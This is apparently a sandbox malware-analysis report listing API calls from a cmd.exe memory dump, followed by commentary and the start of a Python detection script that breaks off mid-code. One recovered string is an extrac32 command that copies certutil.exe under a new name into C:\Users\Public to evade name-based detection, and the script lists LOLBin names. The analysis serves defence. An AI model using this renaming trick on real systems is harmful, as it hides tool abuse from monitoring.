                                      • API String ID: 2081463915-1994581435
                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction ID: 7f187be84442132dabe8ac86962a60c902c156e88d21872a9b076c7b24e859c9
                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                      • Instruction Fuzzy Hash: 6E71A2EBE0864785FBA5BB64E454279AAE0AF01F5CFCC4939D50D426D1DF3CA481C760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr
                                      • String ID:
                                      • API String ID: 1497570035-0
                                      • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                      • Instruction ID: d1f633c6b6fb0e44b5fe9bcbbd241933e0feed8dfb5fa7369eab70d4c93784db
                                      • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                      • Instruction Fuzzy Hash: 36C1F5ABA0864386EA54FB11D4502B9EAA0FF85F5CFCC8535DA5E476D5EE3CE800C720
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                      • Instruction ID: 35e8282dd6c65d539331454d6292c2bf794064cfd052869152998c373a10a7f2
                                      • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                      • Instruction Fuzzy Hash: A5A128ABB0829385EE54AB659414279E6D0EF45FE8FC86238DE7E477C4EE3CE4418310
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • _pipe.MSVCRT ref: 00007FF755CA6C1E
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA6CD1
                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF755CA6CFB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 624391571-0
                                      • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                      • Instruction ID: e55fce43ba3432b5b8bb576e993a65082c0b7668566b214296acca3e6e7e4027
                                      • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                      • Instruction Fuzzy Hash: 4D71B0BBA0864386E704BF24D84007CBAA1EF85F5CB8C8638D65D562D2DF3CA8428760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                      • String ID:
                                      • API String ID: 4268342597-0
                                      • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                      • Instruction ID: 039e8d6bd0ebbcda67988a8f51bb1e8a517c71358c62ca7d9a3c3ab4b88ffc91
                                      • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                      • Instruction Fuzzy Hash: D9813CABA08B8381EA60EF29A540239F7A0FF45F88F9C5135D95D47794DF7CE4818720
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: OpenToken$CloseProcessThread
                                      • String ID:
                                      • API String ID: 2991381754-0
                                      • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                      • Instruction ID: 03d1c4e7bd39eb33a5c1ad34bb4449736f9c0aa4de72b7810273aa77ba832b72
                                      • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                      • Instruction Fuzzy Hash: 3E21A0B7A0868387EB40AB50D4402BDF7A0EB85BB9FD84135DB5943684DF7CD848CB10
                                      APIs
                                      • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF755CCC59E), ref: 00007FF755CA5879
                                        • Part of subcall function 00007FF755CA58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CA5903
                                        • Part of subcall function 00007FF755CA58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CA5943
                                        • Part of subcall function 00007FF755CA58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CA5956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValueVersion
                                      • String ID: %d.%d.%05d.%d
                                      • API String ID: 2996790148-3457777122
                                      • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                      • Instruction ID: b6a7d6b0b2589a00ac258bc0800e19f35b67d16c3cddc1aa6c8e074a7c60735b
                                      • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                      • Instruction Fuzzy Hash: 7DF0A0A3A0838287D750AF56B44006AEBA1FB88B85F988138DA4A07B5ACF3CD514CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 2831795651-0
                                      • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                      • Instruction ID: 355710f07c215fdf803fee34e9766a5a32598a771120d2a62c6b9f9a31cef68a
                                      • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                      • Instruction Fuzzy Hash: A3D181BBA0868386EB60AF21E4402AAB7A1FB44FA8FD81135DE4D07795DF7CD941C710
                                      APIs
                                      • memset.MSVCRT ref: 00007FF755CA7DA1
                                        • Part of subcall function 00007FF755CB417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB41AD
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CA7EB7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                      • String ID:
                                      • API String ID: 168394030-0
                                      • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                      • Instruction ID: 379d33a66a43db0cd142a84019a4d9baa081ae99378e3a08315ffd16e3d6f97f
                                      • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                      • Instruction Fuzzy Hash: BCA1E4EBB0864386FB64AB25D8502BAA791BF85F9CFC84135D94E47AD5DF3CA805C310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InformationQueryToken
                                      • String ID:
                                      • API String ID: 4239771691-0
                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                      • Instruction ID: ea263c37f89da8be4afaf26d64119b07ca01676870b0a2111c2953b0c18c7aa9
                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                      • Instruction Fuzzy Hash: 7D1152F7618782CBEB119F01E4003A9FBA4FB85BA9F884131DB4843694DB7DD588CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FileInformation$HandleQueryVolume
                                      • String ID:
                                      • API String ID: 2149833895-0
                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                      • Instruction ID: a4784cfddd2733536d4f073c4d6325944f77859458b4bed054281874e0eb47f4
                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                      • Instruction Fuzzy Hash: 88115E766086C286E760DB50F4403AEF7A0FB84F98FC85131DA9D42A98DFBCD848CB10
                                      APIs
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • towupper.MSVCRT ref: 00007FF755CA85D4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                      • String ID:
                                      • API String ID: 3520273530-0
                                      • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                      • Instruction ID: 74fc19b69686988f231d6afba240136d7b8b70725e463e4db9f64724c692ab26
                                      • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                      • Instruction Fuzzy Hash: 616196B7A0820387FB64BE24D514379AAA0FB44F5CFC89536DE1E562D5DE3C9880C721
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InformationQueryToken
                                      • String ID:
                                      • API String ID: 4239771691-0
                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                      • Instruction ID: 875a9ddc95e44ca64bfd4ae18c1cdd2d4c10fbac3c5d1ef47ef755c8cab2c0a0
                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                      • Instruction Fuzzy Hash: CAF030B7B14B82CBD7019F64E58449CB778F744B98799853ACB2803704DB75D9A4CB50
                                      APIs
                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CB93BB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                      • Instruction ID: be66ad6f4b71db0c46e88be11e0638df3ff9a333279ef564ee01d2f77ab91b4c
                                      • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                      • Instruction Fuzzy Hash: B4B01299F29443D1D604BB31DC8106052A07F6CF25FC41471C00EC41A0EE1CD5DBC710
                                      APIs
                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF755CAF52A,00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF8DE
                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF8FB
                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF951
                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF96B
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAFA8E
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CAFB14
                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAFB2D
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAFBEA
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CAF996
                                        • Part of subcall function 00007FF755CB0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF755CC849D,?,?,?,00007FF755CCF0C7), ref: 00007FF755CB0045
                                        • Part of subcall function 00007FF755CB0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CCF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CB0071
                                        • Part of subcall function 00007FF755CB0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB0092
                                        • Part of subcall function 00007FF755CB0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CB00A7
                                        • Part of subcall function 00007FF755CB0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB0181
                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD401
                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD41B
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD435
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD480
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                      • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 3964947564-518410914
                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                      • Instruction ID: 739c5bfe93da3d06717b8fa806fb7dfeb09c3d3146ecdaab34266010979c1c5f
                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                      • Instruction Fuzzy Hash: 550271AFA0964386EA55BB21E8402B8F6A1FF45F6DFDC4539D90E47294DF3CA801C760
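The string recovered in this function, extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe, is the batch line behind the report's "Drops or copies certutil.exe with a different name" and "Parent in Public Folder Suspicious Process" signatures: extrac32.exe, a signed cabinet-extraction tool, is used as a plain file copier so that certutil.exe lands in the world-writable C:\Users\Public under the name kn.exe, where process rules keyed on the image name "certutil.exe" no longer fire. As an added example (not part of the Joe Sandbox report and not code from the sample), the Python below turns that pattern into a detection over process-creation records; the Sysmon-style field names, the directory and binary lists, and the sample records are constructed for illustration, and the rule names are assumptions.

```python
"""Flag copy-and-rename of Windows LOLBins in process-creation logs.

Added example, not part of the Joe Sandbox report and not code from the
sample. Records are constructed Sysmon Event ID 1-style dictionaries; the
extrac32 command line is the one recovered from the cmd.exe memory dump.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Hypothetical lists for this example; tune them to the estate being monitored.
SENSITIVE_BINARIES = {"certutil.exe", "cmd.exe", "extrac32.exe", "mshta.exe",
                      "regsvr32.exe", "rundll32.exe"}
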